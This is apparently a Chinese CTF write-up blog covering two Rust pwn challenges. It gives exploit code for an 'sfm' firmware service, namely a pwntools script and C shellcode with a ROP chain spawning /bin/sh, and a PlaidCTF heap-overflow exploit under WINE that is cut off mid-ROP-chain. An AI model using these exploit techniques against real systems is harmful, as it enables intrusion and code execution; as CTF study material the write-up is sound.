# SfmObjectType:NvStorage
cmd += p16(3)
# SfmAuthorizationPolicy
"""
pub struct SfmAuthorizationPolicy {
    policy_type: u16,
    pub data: [u8; 64]
}
"""
# NullPolicy pub data
cmd += p16(0) + b'\x00'*64
# NvStorage + body
cmd += p16(1024)
cmd += exp_rop
print("send object")
client_fd.send(cmd)
print(client_fd.recv(4))

# w.send(cmd)
# print(w.recv(4))

# ----------- ModifyObject --------------
cmd = p32(0) + p16(3) + p16(0)
# object_index, this is initialized
cmd += p32(0)
# cmd += p16(0)
"""
pub struct OwnershipRecordRaw {
    pub country_code: [u8; 2],
    pub _padding: [u8; 2],
    pub owner_name: [u8; 64],
    pub device_name: [u8; 16],
    pub serial_number: [u8; 8],
    pub creation_date: u32,
}
"""
# owner_name = b'B'*64
# prepare rop
owner_name = b'\xff'*51+b'B'*1 + b'\x00'*12
# skip one junk
# owner_name = b'\xff'*52+b'B'*2 + pop_rax_ret +b'b'*2
# device_name = pop_rsp_ret + p64(exp_rop_addr)
device_name = pop_rsp_ret + b'H'*8 # zero cut
serial_number = p64(exp_rop_addr)
# serial_number = b'A'*8
cmd = cmd + b'\x00\x00' + b'\x00\x00' + owner_name + device_name + serial_number + p32(0)

client_fd.send(cmd)
print(client_fd.recv(4))

# SfmCertifyObject
cmd = p32(0) + p16(6) + p16(0)
# OwnershipRecord
cmd += p32(0)
client_fd.send(cmd)

"""
0x7ffccf2f7438: 0x6161616161616161      0x3d4e432c01716262
0x7ffccf2f7448: 0x4242424242424242      0x4242424242424242
0x7ffccf2f7458: 0x4141414141414141      0x4242424242424202
"""


p.interactive()

进一步做题

在Python代码执行成功后，我们需要继续贴合题目。

这里有个小疑问，我们能否直接上传一个shellcode，读取后台题目中的trusted_firmware呢？
其实是不行的，因为这个程序仅能够支持read,write,recvmsg这几个中断调用，这就意味着我们无法读取攻击目标端上的trusted_firmare，而是得用前文提到的那种，上传的程序中**需要把整个trusted_firmware**包含进去。为了能够给我们自己的shellcode腾位置，我们需要按照前文提到的，将对应的binary进行压缩

简单检查了一下UPX的源码之后，发现其用的是一种叫做LZMA的压缩算法，经过上网搜了一段时间之后，找到一个LZ4的压缩算法比较简单。可以使用这个算法帮我们将trusted_firmware压缩，然后我们再在我们的binary里面再把这个压缩后的程序解即可。

构建程序的时候需要注意：

程序应该尽可能的小，并且不包含elf头部等信息，只有基本的代码数据部分
从raw中可以看出，不应当包含libc中的内容，也就是说我们需要尽可能的只使用系统调用完成任务

其中，有一个编译shellcode的技巧是，我们可以让数据放在代码段，这样就可以很简单的只将代码段提取出来，例如我们声明:

1	unsigned char blob[] __attribute__((section(".text")))

此时就能将blob只存放在代码段。

然后就能使用下列编译策略将shellcode取出来

1 2	gcc -Os -nostdlib -Wl,--gc-sections -o firm.o firm.c objcopy -O binary --only-section=.text firm.o firm.bin

调试技巧

这个题目非常讲究调试技巧。首先，这里无法使用前文pwntools的方式辅助调试，毕竟我们此时确实需要启动两个进程；其次，两个进程一定要使用指定的句柄进行通信，这就导致我们不能像平时那样直接让双方进行通信。

这里用了一个取巧的办法，首先使用了下列python脚本创建一个unix stream存在的环境:

import os
import socket
import subprocess


sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
os.set_inheritable(sock1.fileno(), True)
os.set_inheritable(sock2.fileno(), True)

os.environ['SFM_FD'] = str(sock2.fileno())
os.environ['FIRMWARE_FD'] = str(sock1.fileno())

subprocess.call(['bash', '-i'], env=os.environ,pass_fds=(sock1.fileno(), sock2.fileno()))

接下来，在这个shell中，我们再后台启动sfm：

./sfm &

这样我们就能从其他terminal对这个进程进行调试。同时，因为只有当前的terminal中有打开的句柄，此时可以使用

1	./launcer ./firm.bin

来传入有效数据。

再无数次的试错后，终于成功的执行了后台程序:

1 2	├─bash───python3───bash─┬─python3───ba+ └─sh

注意，由于按照我们调试技巧在后端启动了sfm，所以此时的sh其实会执行失败，不过如果能看到sh启动的话，大概率exp就是执行成功了。这里给出相关EXP:

#include 
#include 
#include 
#define __NR_write 1
#define __NR_read 0
#define __NR_recvmsg 47
#define __NR_exit

typedef struct __attribute__((__packed__)) {
unsigned int _reservered;
unsigned short command_code;
unsigned short pad_;
} SfmCommand;

typedef struct __attribute__((__packed__)) {
    SfmCommand cmd;
unsigned short bank_index;
unsigned short pad_;
unsigned char data[1024];
} SfmIntegrityBankUpdate;

typedef struct __attribute__((__packed__)) {
    SfmCommand cmd;
unsigned short flags;
} SfmEstablishSecureIo;

typedef struct __attribute__((__packed__)) {
    SfmCommand cmd;
unsigned short alg_id;
} SfmAttestQuote;

typedef struct __attribute__((__packed__)) {
    unsigned short policy_type;
    unsigned char data[64];
} SfmAuthorizationPolicy;

typedef struct __attribute__((__packed__)) {
unsigned short size;
    unsigned char data[1024];
} NvStorageRaw;

typedef struct __attribute__((__packed__)) {
    SfmCommand cmd;
unsigned short object_type;
    SfmAuthorizationPolicy policy;
    NvStorageRaw nv;
} SfmCreateObject;


typedef struct __attribute__((__packed__)) {
    unsigned char country_code[2];
    unsigned char _padding[2];
    unsigned char owner_name[64];
    unsigned char device_name[16];
    unsigned char serial_number[8];
    unsigned int creation_date;
} OwnershipRecordRaw;

typedef struct __attribute__((__packed__)) {
    SfmCommand cmd;
unsigned int object_index;
    OwnershipRecordRaw record;
} SfmModifyObject;

typedef struct __attribute__((__packed__)) {
    SfmCommand cmd;
unsigned int object_index;
} SfmCertifyObject;

void decompress_and_update();
int integrity_bank_update(int fd, int idx, unsigned char* buf, int size);
int establish_secure_io(int fd, unsigned short flags, int fds[]);
// unsigned long _get_pc();
// const char message[] = "Hello, World!\n";
unsigned char blob[];

ssize_t my_recvmsg(int sockfd, struct msghdr* msg, int flags);
void my_write(int fd, void* message, int length);
ssize_t my_read(int fd, void* buffer, size_t count) ;
// first send "SFMI"
void handshake(int fd);
unsigned long
lz4_depack(const void *src, void *dst, unsigned long packed_size);

#define my_memcpy(dst_, src_, n) \
do {\
    size_t _n = (n);\
    unsigned char* dst = (unsigned char*)dst_;\
    unsigned char* src = (unsigned char*)src_;\
    while (_n-- > 0) { *dst++ = *src++; }\
} while (0)

#define my_memset(dst_, x, n) \
do {\
    size_t _n = (n);\
    unsigned char* dst = (unsigned char*)dst_;\
    while (_n-- > 0) { *dst++ = (unsigned char)(x); }\
} while (0)


int _start(void) {  
    int fd = 3;
    int status = 0;
    int cookie = 0;
status = my_read(fd, &cookie, sizeof(cookie));
my_write(fd, (char *)&cookie, sizeof(cookie));
    // my_write(1, (char *)&cookie, sizeof(cookie));

    unsigned int *input = (unsigned int*)blob;
    unsigned int packed_sz = input[1];
    unsigned char *compressed_ptr = &input[2];

    unsigned char dec_bin[0x3000];
    my_memset(dec_bin, '\x00', sizeof(dec_bin));
    int out_size = 0;
        // int out_size = lz4_depack(compressed_ptr, dec_bin, packed_sz);
    {
        const unsigned char *in = (unsigned char *) compressed_ptr;
        unsigned char *out = (unsigned char *) dec_bin;
        unsigned long dst_size = 0;
        unsigned long cur = 0;
        unsigned long prev_match_start = 0;

        if (in[0] == 0) {
            return 0;
        }

        /* Main decompression loop */
        while (cur < packed_sz) {
            unsigned long token = in[cur++];
            unsigned long lit_len = token >> 4;
            unsigned long len = (token & 0x0F) + 4;
            unsigned long offs;
            unsigned long i;

            /* Read extra literal length bytes */
            if (lit_len == 15) {
                while (in[cur] == 255) {
                    lit_len += 255;
                    ++cur;
                }
                lit_len += in[cur++];
            }

            /* Copy literals */
            for (i = 0; i < lit_len; ++i) {
                out[dst_size++] = in[cur++];
            }

            /* Check for last incomplete sequence */
            if (cur == packed_sz) {
                /* Check parsing restrictions */
                if (dst_size >= 5 && lit_len < 5) {
                    return 0;
                }

                if (dst_size > 12 && dst_size - prev_match_start < 12) {
                    return 0;
                }

                break;
            }

            /* Read offset */
            offs = (unsigned long) in[cur] | ((unsigned long) in[cur + 1] << 8);
            cur += 2;

            /* Read extra length bytes */
            if (len == 19) {
                while (in[cur] == 255) {
                    len += 255;
                    ++cur;
                }
                len += in[cur++];
            }

            prev_match_start = dst_size;

            /* Copy match */
            for (i = 0; i < len; ++i) {
                out[dst_size] = out[dst_size - offs];
                ++dst_size;
            }
        }
        out_size = dst_size;
    }

    for (int i = 0; i < out_size; i += 1024) {
        {
            int fd = 3;
            unsigned char* buf = dec_bin + i;
            int size = 1024;
            SfmIntegrityBankUpdate bank_update;
            my_memset(&bank_update, 0, sizeof(SfmIntegrityBankUpdate));
            bank_update.cmd.command_code = 1;
            bank_update.bank_index = 1;
            my_memcpy(bank_update.data, buf, size);
            char* ptr = (char*)&bank_update;
            int ret_size = 0;
            asm volatile("syscall"
                : "=a" (ret_size)
                : "a"(__NR_write), "D"(fd), "S"(ptr), "d"(sizeof(SfmIntegrityBankUpdate))
                : "memory", "cc", "r11", "cx"
            );
            // my_write(fd, ptr, size);
            int ret_data = 0;
            int ret_value = 0;
            asm volatile("syscall"
                : "=a"(ret_value)
                : "a"(__NR_read), "D"(fd), "S"(&ret_data), "d"(4)
                : "rcx", "r11", "memory"
            );
        }
    }

SfmAttestQuote attest;
    my_memset((unsigned char*)&attest, 0, sizeof(SfmAttestQuote));
    attest.cmd.command_code = 7;
    attest.alg_id = 4;
    my_write(fd, &attest, sizeof(attest));

    unsigned long long libcrypt = 0;
    unsigned long long leak_heap = 0;
    unsigned char data[1024];
    status = my_read(fd, data, 512);
    // data = client_fd.recv(512)
    // print(hexdump(data))
    libcrypt = *(unsigned long long *)&data[0x58];
    libcrypt -= 0x347990;
    // print(hex(libcrypt))
    leak_heap = *(unsigned long long *)&data[0x90];
    // print(hex(leak_heap))
    unsigned long long exp_rop_addr = leak_heap - 0x11620 + 0x18610;
    // print(hex(exp_rop_addr))

    // my_write(std_out, "leak libcrypt address",)
    unsigned long long pop_rsp_ret = libcrypt + 0xb726c;
    unsigned long long pop_rax_ret = libcrypt + 0xd46c7;
    unsigned long long pop_rcx_ret = libcrypt + 0x1bb813;
    unsigned long long mov_rcx_rax_ret = libcrypt + 0x114c45;
    unsigned long long pop_rdi_ret = libcrypt + 0xb71db;
    unsigned long long pop_rsi_ret = libcrypt + 0xba534;
    unsigned long long pop_rdx_ret = libcrypt + 0x2b89d3;
    unsigned long long syscall = libcrypt + 0x11ce96;
    unsigned long long data_segment = libcrypt + 0x43D000;
    unsigned long long data_8_segment = libcrypt + 0x43D008;


    unsigned char exp_rop[400];
    for(int i = 0; i < 400; i++)
    {
        exp_rop[i] = 0;
    }
    unsigned long long*exp_long_ptr = (unsigned long long *)exp_rop;
    
    exp_long_ptr[0] = pop_rax_ret;
    exp_long_ptr[1] = 0x68732f6e69622f2f;
    exp_long_ptr[2] = pop_rcx_ret;
    exp_long_ptr[3] = data_segment;
    exp_long_ptr[4] = mov_rcx_rax_ret;
    exp_long_ptr[5] = pop_rax_ret;
    exp_long_ptr[6] = 0;
    exp_long_ptr[7] = pop_rcx_ret;
    exp_long_ptr[8] = data_8_segment;
    exp_long_ptr[9] = mov_rcx_rax_ret;
    exp_long_ptr[10] = pop_rdi_ret;
    exp_long_ptr[11] = data_segment;
    exp_long_ptr[12] = pop_rsi_ret;
    exp_long_ptr[13] = data_8_segment;
    exp_long_ptr[14] = pop_rdx_ret;
    exp_long_ptr[15] = data_8_segment;
    exp_long_ptr[16] = pop_rax_ret;
    exp_long_ptr[17] = 0x3b;
    exp_long_ptr[18] = syscall;

    SfmCreateObject create_object;
    my_memset(&create_object, 0, sizeof(SfmCreateObject));
    create_object.cmd.command_code = 2;
    create_object.object_type = 3;
    create_object.policy.policy_type = 0;
    create_object.nv.size = 1024;
    my_memcpy((unsigned char*)&create_object.nv.data, (unsigned char*)&exp_rop, sizeof(exp_rop));
    my_write(fd, &create_object, sizeof(SfmCreateObject));
    status = my_read(fd, &status, 4);

    SfmModifyObject modify_object = {0};
    my_memset((unsigned char*)&modify_object, 0, sizeof(SfmModifyObject));
    modify_object.cmd.command_code = 3;
    modify_object.object_index =  0;
    modify_object.record.country_code[0] = 'A';
    modify_object.record.country_code[1] = 'A';

    for(int i = 0; i < 51; i++)
    {
        modify_object.record.owner_name[i] = '\xff';
    }
    modify_object.record.owner_name[51] = 'B';
    // owner_name = b'\xff'*51+b'B'*1 + b'\x00'*12
    my_memcpy(modify_object.record.device_name, &pop_rsp_ret, 8);
    for(int i = 8; i < 16; i++)
    {
        modify_object.record.device_name[i] = 'H';
    }
    my_memcpy(modify_object.record.serial_number, &exp_rop_addr, 8);
    my_write(fd, &modify_object, sizeof(SfmModifyObject));

    // client_fd.send(cmd)
    // print(client_fd.recv(4))
    status = my_read(fd, &status, 4);

    // # SfmCertifyObject
    SfmCertifyObject certify_object = {0};
    my_memset(&certify_object, 0, sizeof(SfmCertifyObject));
    certify_object.cmd.command_code = 6;
    certify_object.object_index = 0;
    // client_fd.send(cmd)
    my_write(fd, &certify_object, sizeof(certify_object));  

    while(1){};
    // p.interactive()
    return 0;
}

void my_write(int fd, void* message, int length) {
    // ssize_t ret;
    asm("syscall"
        : // "=a" (ret)
        : "a"(__NR_write), "D"(fd), "S"(message), "d"(length)
        : "memory", "cc", "r11", "cx"
    );
    // return ret;
}

ssize_t my_read(int fd, void* buffer, size_t count) {
    ssize_t result;
    asm("syscall"
        : "=a"(result)
        : "a"(__NR_read), "D"(fd), "S"(buffer), "d"(count)
        : "rcx", "r11", "memory"
    );
    return result;
}

#include "firmware.c"

最后，我们将程序封装好，然后完成最后的exp编写

from pwn import *
import binascii

fd = open("firm.bin",'rb')
content = fd.read()
content = content.ljust(0x2000,b'\x00')
fd.close()

p = remote("127.0.0.1",4444)
p.recvuntil("> ")
p.sendline("upload")

image = binascii.hexlify(content)
print(hex(len(image)))
p.sendline(image)

p.recvuntil("> ")
p.sendline("run")

p.interactive()

踩坑与总结

踩坑部分

这次的坑踩得实在是太多了，决定在这里记一下，看看经历的磨难。。

程序由于使用了LayoutVerified这个结构体，导致只要结构体不符合要求（不按照结构体对齐->new_from_prefix or 大小与结构体不同->read_from）的时候，就会直接发生错误。所以一开始写PoC的时候，花了很多时间去调试。。。
EXP编写的时候，一开始想用owner_name这个变量，但是后来注意到，如果地址也写进去了的话，也会产生utf-8的问题，导致地址被加入fffd，所以要避免使用这个地址。。
因为拷贝的时候使用的strcpy，所以存在0截断的问题，有些存在0的地方（例如存放地址）就会导致后续的写入内容无法写入，这时就要充分的利用每一个结构体成员（比如serial number）
（调试踩坑）
调试shellcode的时候，一开始想不到怎么调试，直接用pwntools的脚本编写。然而一开始我们sfm的那种调试方案不可行了，因为我们自己写的launcher的firmware可能有问题，根本来不及attach。
接上，其次是，由于我们的shellcode程序是从_start开始的，如果用gdb.attach会来不及在需要断下的地方停下来（因为shellcode已经被执行了），而如果使用gdb.run指令来，则会因为pwntools的gdb无法继承句柄，导致句柄没有被传递过去，无法调试
实际调试的时候，由于要启动两个进程，一开始用了pwntools来启动，结果发现一是没办法定位错误，二是没办法让程序运行（好像会卡住的样子）
后来在想到创建socket之前，用mkfifo创建命名管道，也能模拟socket通信的效果，但是Rust代码指明了用socket，当使用fifo的时候会直接报错
没办法从commandline打开这个socket文件，所以使用代码创建socket的话，需要在利用代码完成环境变量的设置，最后创建一个新的shell
（shellcode编写）
编写shellcode的时候，由于一开始有些系统调用编写的时候未注意到，syscall指令会改变寄存器的值（例如r11），加上汇编高度优化，导致程序的执行逻辑可能会出现意想不到的现象
注意launcher进程，他的传入的fd一定不能是3，不然会被提前关掉。可以检查/proc/launcher_pid/fd确认当前进程打开的句柄是哪个
生成shellcode的时候，很多时候read or write系统调用会被优化掉，需要加上volatile关键字来保护

总结部分

这次在比赛中基本上完全没有跟上思路，大部分内容都是比赛结束之后才能看懂，真的很佩服能在限定时间内做出来的人
这几次Rust比赛下来，似乎已经有了初步的阅读Rust代码的能力了，之后可以尝试做点开发工作进一步深化学习
这次的pwn题环境非常复杂，中途企图只用bash模拟，完全失败。只能用代码配合着创建一个合理的运行环境
由于题目需要手写二进制，其实已经有好多次想要放弃，因为踩得坑实在是太多了，不只是写，还要编译，对抗优化，调试环境配置，几乎每一个问题我都花了一整天才能解决。。。
从结果来看，搭建一个环境非常的重要，否则盲猜几乎无法解决问题。。。

PlaidCTF-baby-heap-question-mark

2023-04-21T14:32:04.000Z

真的好久好久都没写过博客了，感觉还是得是不是用博客这个形式来记录一些重要的信息

baby-heap-question-mark

这个题目虽然是一个Rust Pwn，但是感觉本质上和另一个Rust Pwn差的还是很远的。(如果我能把另一个做出来的话，就也更新上来)

程序逆向

其实Rust的逆向一半的内容得靠猜，因为存在变量复用的现象，下文会提到这点。
首先运行exe，可以看到是一个很经典的堆题:

Storage: []
1. allocate
2. drop
3. read
4. write
5. quit
choice?

每当我们多申请一个堆的时候，Storage这里的显示就会发生变化:

Storage: [*]
1. allocate
2. drop
3. read
4. write
5. quit
choice?

不难想象，这里应该有一个内部的数据结构用于存储分配的内存。
当我们释放一个内存对象的时候，它会变成这样:

Storage: [.]
1. allocate
2. drop
3. read
4. write
5. quit
choice?

其他的操作就和普通的堆题差不多了。
了解运行逻辑之后，直接进行逆向。代码里面有多个类似vec的结构体，大概长这样

struct my_raw_vec
{
  int64 target_size;
  char *ptr_buffer;
  int64 buf_cnt;
};

在allocate这个操作中，分配内存操作如下:

 do
{
    if ( total_raw_vec.capacity == now_total_size )// add middle
    {
        if ( read_size_ )
        {
        new_element = malloc_new_elemn((__int64)read_size_, 1i64);
        if ( !new_element )
            raise_msg();
        capacity_1 = total_raw_vec.capacity;
        if ( total_raw_vec.capacity != total_raw_vec.buffer_end )
            goto LABEL_52;
LABEL_51:
        extend_mem(&total_raw_vec, capacity_1);
        capacity_1 = total_raw_vec.capacity;
        }
        else
        {
        new_element = 1i64;
        if ( total_raw_vec.capacity == total_raw_vec.buffer_end )
            goto LABEL_51;
        }
LABEL_52:
        raw_vec_1 = total_raw_vec.ptr_buffer;
        capacity_idx = capacity_1;
        total_raw_vec.ptr_buffer[capacity_idx].target_size = (__int64)read_size_;
        raw_vec_1[capacity_idx].ptr_buffer = (char *)new_element;
        raw_vec_1[capacity_idx].buf_cnt = read_size_;
        ++total_raw_vec.capacity;
        goto LABEL_2;
    }
    now_total_size_ = now_total_size * 24 + 24;
}
while ( total_raw_vec.ptr_buffer[now_total_size++].ptr_buffer != 0i64 );

其实它的allocate有两种模式，这边我们挑一种来讲（漏洞会涉及）。这里会提到一个大小为24字节的结构体就是前文讲的struct my_raw_vec。
首先最外围的大循环的逻辑，加上 total_raw_vec.capacity == now_total_size逻辑，结合起来其实就是检查这个total_raw_vec，其中是否存在一个空的指针。如果不存在的话（也就是我们只有allocate操作，没有drop过），此时会先申请一个用于存放我们数据的堆块element，再扩张vector。并且之后将这个新的element存放在新扩展出来的出来的total_raw_vec中。
如果我们大致用伪代码描述以下，大概是如下的逻辑:

// 先申请一个element
Elem* e = new Element();
// 然后扩展vector
vector.extend(1);
// 最后存入vector
vector[new_idx] = e;

漏洞点

这个程序其实最大的问题在于逆向，当逆向完成了一个操作之后，其他的逻辑基本上也就完成了。这里我们直接介绍漏洞操作，也就是write：

write_read(&read_data, (__int64)"data? size? \n", 6i64);// hear is "data? " so it read data from console
buffer = read_data.ptr_buffer;
now_ptr_1 = check_utf8_valid(read_data.ptr_buffer, read_data.buf_cnt);
if ( (v19 & 1) != 0 )
{
v46 = 1i64;
goto LABEL_68;
}
my_data_num.flag = 3;
IOStruct.my_vec.elem_idx = 0i64;
IOStruct.my_vec.now_ptr = (__int64)now_ptr_1;
IOStruct.my_vec.capacity_ = v19;
IOStruct.my_vec.now_size = 2i64;
IOStruct.my_data_num = &my_data_num;
get_input_data((my_raw_vec *)(&v47 + 14), &IOStruct);// get input data from IOStruct into dst

Rust编译的时候，有时候会将一些可见字符拼接再一起。如上，他这边的翻译极具误导性，会给人一种write操作会读入数据，并且需要我们指定大小的错觉。然而实际上，这个题的write只需要我们输入数据。并且这个题目输入的数据是需要被反序列化的。举个例子，当我们输入:

此时写入到我们指定内存的其实是\x01\x01，而不是字符串。因此此时输入的长度一定要是偶数。
回到逻辑，上述代码主要就是将我们输入的数据读入一个叫做read_data的临时变量，并且通过调用check_utf8_valid确认其是否合法，同时返回了一个指向有效字符串起始地址的指针。并且在最后使用get_input_data将我们的输入读入了一个地址。这个地址的变量我们之后命名为dst

target_size = dst.target_size;
ptr_buffer_1 = dst.ptr_buffer;
cnt = dst.buf_cnt;
if ( read_data.target_size )          // here is reading size
    j_free_last_ptr(buffer, read_data.target_size, read_data.target_size >= 0);// free reading buffer
v50 = HIDWORD(target_size);
if ( idx < total_raw_vec.capacity )
{
    target_buffer = total_raw_vec.ptr_buffer[idx].ptr_buffer;
    if ( target_buffer )
        memcpy(target_buffer, ptr_buffer_1, cnt);
}
if ( target_size )
    j_free_last_ptr(ptr_buffer_1, target_size, target_size >= 0);
break;

接下来的漏洞利用部分就很简单了，首先我们可以看到，这个地方调用了memcpy，而这边的cnt来自于dst，dst本质上也是一个向量，而且其就是前文提到的用来存放读入数据的一个变量。也就是说，上述逻辑翻译一下就是：将输入的字符串全部拷贝到目标内存。那这就有了一个妥妥的堆溢出了。

利用

WINE的一些基础知识

这个点也是队友给我科普的，首先WINE全程可以是Wine Is Not an Emulator（乐），本质上是让exe能够在Unix操作系统上运行的一个环境。注意，它不是虚拟机，所以并不具备虚拟机的一些基本特性。

不变的基地址

除了msvcrt.dll之外，所有的模块，包括堆和栈，都没有开ASLR。所以一旦确认了远程地址的这些偏移，可以直接用起来。（注意，包括exe在ida里面显示的地址，都是不变的）

模拟的PE头

如果存在一些检测PE头的逻辑，是可以通过的。虽然这些dll之类的本质是.so，但是构建的时候，会预先额外构建一个PE头。

调试

理论上也是可以直接调试的。运行指令为 wine simple_server_target.exe，然后再用gdb attach到对应的进程即可。

奔溃现场

WINE程序有一个特别之处就是，如果我们让程序奔溃了，它会打印当前的上下文出来。例如

一些技巧

有一个叫做VIRTUAL_SetForceExec的存在ntdll.dll.so的函数，可以让所有可写的映射变成可执行！这样会让利用更加简单。
可以通过调用NtSetInformationProcess函数来控制，也可以从这个函数处找到这个SetForceExec的地址

根据上面的小tips，我们可以得知对于本题的一个重要的提示：除了msvcrt.dll.so，所有的地址都是固定的。换句话说，假设我们能够拥有一个内存越界读，只要能泄露一次地址，之后的地址就可以反复的使用它。然后，WINE这个程序还有一个特征，当这个程序奔溃的时候，会打印这个程序的上下文！这样很多的地址其实在dump的时候就能够确定了。

回到这个题目，目前为止内存格式如下:

+---------------+<-----------------+
|               |                  |
|  Data         |                  |
|               |                  |
|               |                  |
|               |                  |
|               |                  |
|               |                  |
+---------------+                  |
                                   |
                                   |
+---------------+                  |
|               |                  |
+---------------+                  |
| Target_buffer +------------------+
+---------------+
|               |
+---------------+

那么此时我们就可以通过将target_ptr覆盖成无效地址，并且再次访问这段内存对应的data，从而诱发crash

+---------------+
|               |                  
|  Data         |                  
|               |                  
|               |                 
|               |                  
|               |                 
|               |                  
|               |                  
|               |                  
|               |                  
+---------------+                  
|               |                  
+---------------+                  
|ffffffffffffff +------------------++++++++++++
+---------------+
|               |
+---------------+

通过简单的内存布局后，这边是我们修改内存地址之后尝试访问触发的crash:

Unhandled exception: page fault on write access to 0xffffffffffffffff in 64-bit code (0x00000003af6cfcd9
).
Register dump:
 rip:00000003af6cfcd9 rsp:000000000021fa98 rbp:000000000021fb60 eflags:00010a07 (  R- --O I   - -P-C)                                                                                                             rax:0000000000015790 rbx:0000000000000000 rcx:ffffffffffffffff rdx:00000000000158a0                                                                                                                              rsi:00000000000158a0 rdi:ffffffffffffffff  r8:0000000000000040  r9:7fffffffffffffff r10:000000000012000
0
 r11:0000000000015898 r12:000000000021fb90 r13:00000001400214c5 r14:0000000000000040 r15:000000000021fb5
0
Stack dump:
0x000000000021fa98:  0000000000000040 0000000000015800
0x000000000021faa8:  00000003af6d5749 000000000021fb90
0x000000000021fab8:  00000001400214c5 0000000140001eb8
0x000000000021fac8:  000000000021fb50 000000000021fb60
0x000000000021fad8:  000000014000190d 0000000000014e70
0x000000000021fae8:  0000000000014430 0000000000000004
0x000000000021faf8:  0000000140004e4a 00000000000152b8
0x000000000021fb08:  000000007bc2aa8d 0000000000000003
0x000000000021fb18:  0000000000000018 0000000000015760
0x000000000021fb28:  0000000000000000 0000000000000082
0x000000000021fb38:  0000000000015800 0000000000000082
0x000000000021fb48:  00000000000158a0 0000000000000040
Backtrace:
=>0 0x00000003af6cfcd9 EntryPoint+0x2fffe3739() in ucrtbase (0x000000000021fb60)
0x00000003af6cfcd9 EntryPoint+0x2fffe3739 in ucrtbase: movsb    (%rsi),%es:(%rdi)
Modules:
Module  Address                                 Debug info      Name (20 modules)
PE              7b000000-        7b3fd000       Deferred        kernelbase
PE              7b600000-        7b969000       Deferred        kernel32
PE              7bc00000-        7bf3c000       Deferred        ntdll
ELF             7d000000-        7d005000       Deferred        
PE             140000000-       14002f000       Deferred        baby-heap-question-mark
PE             262250000-       262260000       Deferred        api-ms-win-crt-runtime-l1-1-0
PE             26ed50000-       26ed69000       Deferred        vcruntime140
PE             30a2c0000-       30a2d0000       Deferred        api-ms-win-crt-stdio-l1-1-0
PE             355100000-       35510f000       Deferred        api-ms-win-crt-locale-l1-1-0
PE             360a80000-       360a91000       Deferred        api-ms-win-crt-math-l1-1-0
PE             39b510000-       39b51f000       Deferred        api-ms-win-crt-heap-l1-1-0
PE             3af670000-       3af9dd000       Dwarf           ucrtbase
ELF         7f00eb2ec000-    7f00eb30a000       Deferred        ucrtbase.so
ELF         7f00eb60a000-    7f00eb780000       Dwarf           libwine.so.1
ELF         7f00eb980000-    7f00eb9ab000       Deferred        liblzma.so.5
ELF         7f00eb9ab000-    7f00eba92000       Deferred        libm.so.6
ELF         7f00eba92000-    7f00ebaad000       Deferred        libunwind.so.8
ELF         7f00ebaad000-    7f00ebb49000       Deferred        ntdll.so

注意，测试的时候使用的地址一定要是0xffffffffffffffff，之前使用0xaaaaaaaaaaaaaaaa居然是有效地址，不会导致崩溃。。。
由于这个target_ptr可以被修改成任何值，我们就相当于有了一个WWW，也就是write-what-where。

之后漏洞利用就很简单了，由于这个程序几乎等于没有开ASLR，于是我们可以利用dump数据，直接算出程序返回值地址。然后通过修改target_ptr指向栈尾部，然后就能直接塞ROP的指令进去了。
然而，一开始我们直接使用溢出攻击的时候，程序会直接崩溃在调用quit指令的时候，原因是我们这边溢出会修改堆的头部，而quit的时候会调用free，所以此时释放堆会发生错误。此时我们可以直接通过gdb调试，把被覆盖的数据抠出来，然后再payload钟直接按照原样写入对应位置。最后可以写出如下的exp

from pwn import *
from binascii import hexlify

context.clear(arch='amd64', os='windows', log_level='debug')
#r = remote("172.17.0.2",7777)
r = process(['docker', 'run', '--privileged', '--rm' ,'-i', 'my_image'])
"""
PE            7b000000-        7b3fd000    Deferred        kernelbase
PE            7b600000-        7b969000    Dwarf           kernel32
PE            7bc00000-        7bf3c000    Dwarf           ntdll
ELF            7d000000-        7d005000    Deferred        
PE           140000000-       14002f000    Export          baby-heap-question-mark
PE           262250000-       262260000    Deferred        api-ms-win-crt-runtime-l1-1-0
PE           26ed50000-       26ed69000    Deferred        vcruntime140
PE           30a2c0000-       30a2d0000    Deferred        api-ms-win-crt-stdio-l1-1-0
PE           355100000-       35510f000    Deferred        api-ms-win-crt-locale-l1-1-0
PE           360a80000-       360a91000    Deferred        api-ms-win-crt-math-l1-1-0
PE           39b510000-       39b51f000    Deferred        api-ms-win-crt-heap-l1-1-0
PE           3af670000-       3af9dd000    Deferred        ucrtbase
ELF        7f26a0026000-    7f26a0046000    Deferred        libgcc_s.so.1
ELF        7f26a004b000-    7f26a0069000    Deferred        ucrtbase.so
ELF        7f26a0369000-    7f26a04df000    Dwarf           libwine.so.1
ELF        7f26a06df000-    7f26a070a000    Deferred        liblzma.so.5
ELF        7f26a070a000-    7f26a07f1000    Deferred        libm.so.6
ELF        7f26a07f1000-    7f26a080c000    Deferred        libunwind.so.8
ELF        7f26a080c000-    7f26a08a8000    Deferred        ntdll.so
ELF        7f26a08ab000-    7f26a0ad3000    Deferred        libc.so.6
ELF        7f26a0ada000-    7f26a0b16000    Deferred        ld-linux-x86-64.so.2
"""
# REMOTE = False
# if REMOTE:
#     r = remote("bhqm.chal.pwni.ng",1337)
#     print(r.recvline())
#     r.sendline(input(">").strip())
# else:
#     r = process("baby-heap-question-mark.exe")

def allocate(size):
    r.sendlineafter("choice?","1")
    r.sendlineafter("size?",str(size))

def drop(index):
    r.sendlineafter("choice?","2")
    r.sendlineafter("index?",str(index))

def read(index):
    r.sendlineafter("choice?","3")
    r.sendlineafter("index?",str(index))

def write(index,data):
    r.sendlineafter("choice?","4")
    r.sendlineafter("index?",str(index))
    # r.sendlineafter("data?",hexlify(data))
    r.sendlineafter("data?",hexlify(data))

for i in range(9):
    allocate(24)

pause()
stack = 0x21fc08
payload = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F\x008\x00E\x009\x00C\x004\x004\x00D\x00\x88\x01\x00\x00USE\x08'
print(payload)
rop_payload = payload + p64(0x18)
rop_payload += p64(stack)
write(8,rop_payload)

pop_rax = p64(0x0000000140008874) # pop_rax
pop_rdi = p64(0x000000014000222c) # pop rdi; ret; 
pop_rsi = p64(0x00000003af68655a) # pop rsi; ret; 
pop_rdx = p64(0x00000003af6b3fa9) # pop rdx ; add eax, 0x7e0f6600 ; ret
syscall = p64(0x00000003af67bb76) # syscall

addr = 0x0
# prepare write data
rop_payload = b''
rop_payload += pop_rsi
rop_payload += p64(0) # set argv = 0
rop_payload += pop_rdx
rop_payload += p64(0) # set envp = 0
rop_payload += pop_rax # 0x40
rop_payload += p64(59) # execve
